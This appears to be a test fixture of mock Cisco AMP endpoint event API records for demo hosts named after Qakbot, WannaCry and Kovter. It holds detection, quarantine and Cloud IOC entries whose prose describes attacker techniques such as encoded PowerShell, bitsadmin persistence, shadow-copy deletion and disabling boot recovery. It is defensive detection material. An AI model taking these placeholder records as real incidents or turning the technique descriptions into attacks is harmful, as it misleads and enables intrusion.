IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. 
This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. 
This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. 
This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. 
Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. 
Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. 
This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} 
